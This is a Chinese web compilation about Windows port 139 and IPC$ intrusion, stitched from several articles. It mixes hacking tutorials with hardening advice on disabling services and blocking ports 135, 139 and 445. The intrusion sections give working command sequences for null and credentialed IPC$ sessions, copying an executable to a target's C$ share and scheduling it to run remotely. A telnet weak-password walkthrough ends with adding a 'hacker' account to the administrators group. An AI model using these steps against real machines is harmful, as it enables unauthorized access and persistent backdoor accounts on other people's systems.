139端口入侵

入侵中可能会用到的命令为了这份教程的完整性，我列出了ipc$入侵中的一些常用命令，如果你已经掌握了这些命令，你可以跳过这一部分看下面的内容。

请注意这些命令是适用于本地还是远程，如果只适用于本地，你只能在获得远程主机的shell（如cmd，telnet等）后，才能向远程主机执行。

1 建立/删除ipc$连接的命令1）建立空连接:net use \\127.0.0.1\ipc$ "" /user:""2）建立非空连接:net use \\127.0.0.1\ipc$ "密码" /user:"用户名"3）删除连接:net use \\127.0.0.1\ipc$ /del2 在ipc$连接中对远程主机的操作命令1）查看远程主机的共享资源（看不到默认共享）:net view \\127.0.0.12）查看远程主机的当前时间:net time \\127.0.0.13）得到远程主机的netbios用户名列表:nbtstat -A 127.0.0.14）映射/删除远程共享:net use z: \\127.0.0.1\c此命令将共享名为c的共享资源映射为本地z盘net use z: /del删除映射的z盘，其他盘类推5）向远程主机复制文件:copy 路径\文件名\\IP\共享目录名，如：copy c:\xinxin.exe \\127.0.0.1\c$即将c盘下的xinxin.exe复制到对方c盘内当然，你也可以把远程主机上的文件复制到自己的机器里：copy \\127.0.0.1\c$\xinxin.exe c:\6）远程添加计划任务:at \\IP时间程序名如：at \\127.0.0.0 11:00 xinxin.exe注意：时间尽量使用24小时制；如果你打算运行的程序在系统默认搜索路径（比如system32/）下则不用加路径，否则必须加全路径3 本地命令1）查看本地主机的共享资源（可以看到本地的默认共享）net share2）得到本地主机的用户列表net user3）显示本地某用户的帐户信息net user 帐户名4）显示本地主机当前启动的服务net start5）启动/关闭本地服务net start 服务名net stop 服务名6）在本地添加帐户net user 帐户名密码/add7）激活禁用的用户net uesr 帐户名/active:yes8）加入管理员组net localgroup administrators 帐户名/add很显然的是，虽然这些都是本地命令，但如果你在远程主机的shell中输入，比如你telnet 成功后输入上面这些命令，那么这些本地输入将作用在远程主机上。

微软Windows系统十大隐患服务细评现在不少人倾向于使用Server版的操作系统进行网络服务的架设。

不可否认，和Pro 版系统相比，Server版的系统的确给个人用户提供了更为强大的网络管理功能。

但是，当你查看系统进程时，面对众多进程，你可知Server版操作系统在你的后台启动了哪些服务吗?这些服务安全吗?你是否真的需要这些服务呢?Messenger危害种类:信息骚扰危害系数:★★★这是发送和接收系统管理员或"警报器"服务消息的服务。

自微软公司于90年代中期推出32位操作系统以来，该服务就一直是Windows操作系统中不可缺少的一部分。

现在，很多垃圾邮件发送者都利用这一功能向计算机用户发送垃圾信息，建议大家禁用该服务。

Remote Registry Service危害种类:恶意攻击危害系数:★★★★该服务允许远程用户通过简单的连接就能修改本地计算机上的注册表设置。

知道管理员账号和密码的人远程访问注册表是很容易的。

打开注册表编辑器，选择"文件"菜单中的"连接网络注册表"选项，在"选择计算机"对话框里的"输入要选择的对象名称"下的输入框中输入对方的IP地址，点击"确定"按钮便会出现一个"输入网络密码"对话框，输入管理员账号和密码，点击"确定"按钮后就可对目标机器的注册表进行修改了。

现在，不少木马后门程序可以通过此服务来修改目标机器的注册表，强烈建议大家禁用该项服务。

ClipBook危害种类:信息泄露危害系数:★★★这个服务允许任何已连接的网络中的其他用户查看本机的剪贴板。

为了安全，强烈建议大家将该服务设置为手动。

ClipBook所支持的ClipBook Viewer程序可以允许剪贴页被远程计算机上的ClipBook浏览，可以使用户能够通过网络连接来剪切和粘贴文本和图形。

屏蔽135 139 445 3389端口的方法以及网络端口安全防护技巧默认情况下，Windows有很多端口是开放的，在你上网的时候，网络病毒和黑客可以通过这些端口连上你的电脑。

为了让你的系统变为铜墙铁壁，应该封闭这些端口，主要有：TCP 135、139、445、593、1025 端口和UDP 135、137、138、445 端口，一些流行病毒的后门端口（如TCP 2745、3127、6129 端口），以及远程服务访问端口3389。

下面介绍如何在WinXP/2000/2003下关闭这些网络端口：第一步，点击“开始”菜单/设置/控制面板/管理工具，双击打开“本地安全策略”，选中“IP 安全策略，在本地计算机”，在右边窗格的空白位置右击鼠标，弹出快捷菜单，选择“创建IP 安全策略”（如右图），于是弹出一个向导。

在向导中点击“下一步”按钮，为新的安全策略命名；再按“下一步”，则显示“安全通信请求”画面，在画面上把“激活默认相应规则”左边的钩去掉，点击“完成”按钮就创建了一个新的IP 安全策略。

第二步，右击该IP安全策略，在“属性”对话框中，把“使用添加向导”左边的钩去掉，然后单击“添加”按钮添加新的规则，随后弹出“新规则属性”对话框，在画面上点击“添加”按钮，弹出IP筛选器列表窗口；在列表中，首先把“使用添加向导”左边的钩去掉，然后再点击右边的“添加”按钮添加新的筛选器。

第三步，进入“筛选器属性”对话框，首先看到的是寻址，源地址选“任何IP 地址”，目标地址选“我的IP 地址”；点击“协议”选项卡，在“选择协议类型”的下拉列表中选择“TCP”，然后在“到此端口”下的文本框中输入“135”，点击“确定”按钮（如左图），这样就添加了一个屏蔽TCP 135（RPC）端口的筛选器，它可以防止外界通过135端口连上你的电脑。

点击“确定”后回到筛选器列表的对话框，可以看到已经添加了一条策略，重复以上步骤继续添加TCP 137、139、445、593 端口和UDP 135、139、445 端口，为它们建立相应的筛选器。

用TELNET弱口令我给你例子看好了c:\>telnet 192.168.0.1user:administratorpossword:[如果是弱口令密码可能是空的或是简单的]下面就进入他的shall了c:\>net user hacker[用户] hacker[密码自己定义] /addc:\>net localgroup administrator hacker [用户] /add这是个自己在他的计算机中建立自己的用户并提升为管理员权限还有你可以用IPC$命令攻击ipc$与空连接,139,445端口,默认共享的关系以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)1)ipc$与空连接:不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).2)ipc$与139,445端口:ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.3)ipc$与默认共享默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)五ipc$连接失败的原因以下5个原因是比较常见的:1)你的系统不是NT或以上操作系统;2)对方没有打开ipc$默认共享3)对方未开启139或445端口(惑被防火墙屏蔽)4)你的命令输入有误(比如缺少了空格等)5)用户名或密码错误(空连接当然无所谓了)另外,你也可以根据返回的错误号分析原因：错误号5，拒绝访问：很可能你使用的用户不是管理员权限的，先提升权限；错误号51，Windows 无法找到网络路径: 网络有问题；错误号53，找不到网络路径：ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）；错误号67，找不到网络名：你的lanmanworkstation服务未启动；目标删除了ipc$；错误号1219，提供的凭据与已存在的凭据集冲突：你已经和对方建立了一个ipc$，请删除再连。

通过防火墙看到网络流量50%以上被System的东西占用着，而公司其实电脑都用同样的防火墙看不到System占用流量。

查看具体情况发现主机流向三个端口，135,139,445,后来通过防火墙和本地安全策略来禁用这三个端口，效果不大！今天又查到以配置注册表来禁用445端口的方法：修改注册表，添加一个键值Hive: HKEY_LOCAL_MACHINE Key:System\CurrentControlSet\Services\NetBT\Parameters Name: SMBDeviceEnabled Type: REG_DWORD Value: 0 重起后，立马无445端口的流量动态。

效果非常有效！求使用注册表来禁用135和139端口的方法！Windows中如何手动关闭端口和阻止非法入侵我们一般采用一些功能强大的反黑软件和防火墙来保证我们的系统安全，但是有些用户不具备上述条件。

怎么办呢？下面就介绍一种简易的办法——通过限制端口来帮助大家防止非法入侵。

非法入侵的方式简单说来，非法入侵的方式可粗略分为4种：1、扫描端口，通过已知的系统Bug攻入主机。

2、种植木马，利用木马开辟的后门进入主机。

3、采用数据溢出的手段，迫使主机提供后门进入主机。

4、利用某些软件设计的漏洞，直接或间接控制主机。

非法入侵的主要方式是前两种，尤其是利用一些流行的黑客工具，通过第一种方式攻击主机的情况最多、也最普遍；而对后两种方式来说，只有一些手段高超的黑客才利用，波及面并不广泛，而且只要这两种问题一出现，软件服务商很快就会提供补丁，及时修复系统。

因此，如果能限制前两种非法入侵方式，就能有效防止利用黑客工具的非法入侵。

而且前两种非法入侵方式有一个共同点，就是通过端口进入主机。

端口就像一所房子(服务器)的几个门一样，不同的门通向不同的房间(服务器提供的不同服务)。

我们常用的FTP默认端口为21，而WWW网页一般默认端口是80。

但是有些马虎的网络管理员常常打开一些容易被侵入的端口服务，比如139等；还有一些木马程序，比如冰河、BO、广外等都是自动开辟一个您不察觉的端口。

139端口入侵(更加详细)附图下面先给大家介绍一下什么是NETBIOS：Netbios（NETwork Basic Input/Output System）网络基本输入输出系统。

是1983年IBM开发的一套网络标准，微软在这基础上继续开发。

微软的客户机／服务器网络系统都是基于NetBIOS的。

在利用Windows NT4.0 构建的网络系统中，对每一台主机的唯一标识信息是它的NetBIOS名。

系统可以利用WINS服务、广播及Lmhost文件等多种模式将NetBIOS名解析为相应IP地址，从而实现信息通讯。

在这样的网络系统内部，利用NetBIOS名实现信息通讯是非常方便、快捷的。

但是在In ternet上,它就和一个后门程序差不多了。

不少骇客就是通过这个漏洞入侵计算机的！下面是经常用的139端口的攻与防第一步我们需要做的是确定一台存在139端口漏洞的主机。

可以用扫描工具扫描得到！我就不说了第二步假设现在我们已经得到一台存在139端口漏洞的主机，我们要使用nbtstat -a IP这个命令得到用户的情况！如下图：上图中的202.98.84.90就是我的IP地址，这个主机的名字是21，工作组是YB第三步我们要做的是与对方计算机进行共享资源的连接在这里我们需要用到两个NET命令，下面就是这两个命令的使用方法NET VIEW?作用：显示域列表、计算机列表或指定计算机的共享资源列表。

?命令格式：net view [\\computername | /domain[:domainname]]?参数介绍：?<1>键入不带参数的net view显示当前域的计算机列表。

?<2>\\computername 指定要查看其共享资源的计算机。

?<3>/domain[:domainname]指定要查看其可用计算机的域?NET USE?作用：连接计算机或断开计算机与共享资源的连接，或显示计算机的连接信息。

135,137,138,139端口的作用135端口：135端口主要用于使用RPC（Remote Procedure Call，远程过程调用）协议并提供DCOM（分布式组件对象模型）服务。

端口说明：135端口主要用于使用RPC（Remote Procedure Call，远程过程调用）协议并提供DCOM（分布式组件对象模型）服务，通过RPC可以保证在一台计算机上运行的程序可以顺利地执行远程计算机上的代码；使用DCOM可以通过网络直接进行通信，能够跨包括HTTP协议在内的多种网络传输。

端口漏洞：相信去年很多Windows 2000和Windows XP用户都中了“冲击波”病毒，该病毒就是利用RPC漏洞来攻击计算机的，端口就是135。

137端口：137端口主要用于“NetBIOS Name Service”（NetBIOS名称服务）。

端口说明：137端口主要用于“NetBIOS Name Service”（NetBIOS名称服务），属于UDP端口，使用者只需要向局域网或互联网上的某台计算机的137端口发送一个请求，就可以获取该计算机的名称、注册用户名，以及是否安装主域控制器、IIS是否正在运行等信息。

端口漏洞：因为是UDP端口，对于攻击者来说，通过发送请求很容易就获取目标计算机的相关信息，有些信息是直接可以被利用，并分析漏洞的，比如IIS 服务。

另外，通过捕获正在利用137端口进行通信的信息包，还可能得到目标计算机的启动和关闭的时间，这样就可以利用专门的工具来攻击。

139端口：139端口是为“NetBIOS Session Service”提供的，主要用于提供Windows文件和打印机共享以及Unix中的Samba服务。

端口说明：139端口是为“NetBIOS Session Service”提供的，主要用于提供Windows文件和打印机共享以及Unix中的Samba服务。

在Windows中要在局域网中进行文件的共享，必须使用该服务。